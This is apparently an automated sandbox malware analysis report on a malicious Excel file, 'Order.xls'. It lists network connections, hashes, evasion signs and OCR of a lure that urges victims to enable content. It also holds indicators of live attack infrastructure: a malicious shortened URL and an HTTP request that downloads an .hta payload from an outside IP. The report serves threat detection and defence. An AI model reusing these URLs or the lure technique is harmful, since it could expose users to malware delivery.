Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991

Source: excel.exe

Memory has grown: Private usage: 2MB later: 97MB

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 14.103.79.10 14.103.79.10

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74

Source: global traffic

DNS traffic detected: DNS query: s.deemos.com

Source: Order.xls, A3430000.0.dr

String found in binary or memory: https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443

Source: unknown

HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.10:49990 version: TLS 1.2

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: screenshot	OCR: document is protected the document in If this dcxurnent was Once you have enabled 3 iting, please cl
Source: screenshot	OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Sheet2 Sheet3 Ready & Acces
Source: screenshot	OCR: document is protected Tab O Office 2 20 Rea the dxument in If this docurnent was the yellow bar abo
Source: screenshot	OCR: Enable Content" from the yellow bar atx:yve BNAGMGS... EEGV.'XUH... EIVQSAOTAC_ EO'VRVP... Sheetz S
Source: screenshot	OCR: document is protected the document in If this dcxurnent was Once you have enabled O 3 editing, pleas
Source: screenshot	OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Renmks. 1 : Above price is
Source: screenshot	OCR: document is protected the document in If this dcxurnent was Once you have enabled O 3 editing, pleas
Source: screenshot	OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Renmks. 1 : Above price is
Source: screenshot	OCR: document is protected 16 17 18 19 20 27 28 29 30 N.o.R ac VsI drop Anchor u Tanks ins s Tanks inss I
Source: screenshot	OCR: Enable Content" from Final calculation started Final calculation ended Cargo arm disconnected Shippe
Source: screenshot	OCR: document is protected Open the dckument in Microsoft Office previewing online is not available for 2
Source: screenshot	OCR: Enable Content" from Sheetl Sheet2 Ready Accessibility: Investigate Sheet3 Final calculation started

Excel sheet contains many unusual embedded objects

Source: Order.xls	OLE: Microsoft Excel 2007+
Source: Order.xls	OLE: Microsoft Excel 2007+
Source: Order.xls	OLE: Microsoft Excel 2007+
Source: A3430000.0.dr	OLE: Microsoft Excel 2007+
Source: A3430000.0.dr	OLE: Microsoft Excel 2007+

Document contains embedded VBA macros

Source: Order.xls

OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: Order.xls	Stream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[hpy1,,{6X`+\|gL[cMnjD0`1{(+i(g=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+
Source: A3430000.0.dr	Stream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[hpy1,,{6X`+\|gL[cMnjD0`1{(+i(g=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFBA0519920D42AF1E.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal72.winXLS@4/9@1/2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\Desktop\A3430000

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{A785AF81-2D41-4623-851C-82C67F9C24C6} - OProcSessId.dat

Jump to behavior

Source: Order.xls	OLE indicator, Workbook stream: true
Source: A3430000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Order.xls

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: Order.xls

Static file information: File size 1275904 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: ~DFBA0519920D42AF1E.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Order.xls

Initial sample: OLE indicators encrypted = True

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Order.xls	Stream path 'Workbook' entropy: 7.99915790275 (max. 8.0)
Source: A3430000.0.dr	Stream path 'Workbook' entropy: 7.99586369302 (max. 8.0)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 742

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

ID:	1592075
Product:	CloudBasic
Start time:	18:17:12
Start date:	15.01.2025
Sample:	Order.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	439a22208699135960b30717b0aeedbc
SHA1:	f0a626b392d2cf72659b567e8a75d8d862195669
SHA256:	b04e78fa62cab8562fdcd884fa8813a4e802c8f78bfa8c1d25db2a8684868dd0
Filetype:	Microsoft Excel sheet (30009/1) 47.99%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	573220372DA4ED487441611079B623CD	8F9D967AC6EF34640F1F0845214FBC6994C0CB80	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
C:\Users\user\AppData\Local\Temp\6270F617.tmp	data	E02894C0E3B9BB9436695C986FA8F7F8	565183072CEB20C3F8A440A4EBDAFB53838EBAE2	6EDE8F6D66141DD67235F60CC983C0F904A8CFF32C5930A98954C99D9C688BB7
C:\Users\user\AppData\Local\Temp\~DF472365DE6A9C8783.TMP	data	86C54E5F0CC6B43F961013E4D33B528B	7B44632C4621F5CA7F472882252EFA84FC672D27	CE4E44713086EBB8C868AD07640CF50F3CBF4D445AEA99114EC68C3C0CD334F9
C:\Users\user\AppData\Local\Temp\~DFBA0519920D42AF1E.TMP	Composite Document File V2 Document, Cannot read section info	E348C90F13BD682A43DE686D35E6C29C	926EFF9E4609FC3341571F44CA87C9E6173361D7	D17F4D84A691CF7352C998523A42A19A96510F2DEE3248CA5067B9E3CFE79775
C:\Users\user\AppData\Local\Temp\~DFDD84A01DDA73EAD7.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFF4C625683059C06A.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\A3430000	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 15 17:19:33 2025, Security: 1	F2B60A5191F0B4C4DF9CCAA6E4E67DB1	FC292BF45D2DA60676E5A6798B362CA2F33EA2EE	2D920F429832ED6F979EBD9ED9F3A956E300EF6E71E239BCE0EC7E920EED9BDE
C:\Users\user\Desktop\A3430000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\Order.xls (copy)	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 15 17:19:33 2025, Security: 1	F2B60A5191F0B4C4DF9CCAA6E4E67DB1	FC292BF45D2DA60676E5A6798B362CA2F33EA2EE	2D920F429832ED6F979EBD9ED9F3A956E300EF6E71E239BCE0EC7E920EED9BDE

Windows Analysis Report
Order.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Order.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Order.xls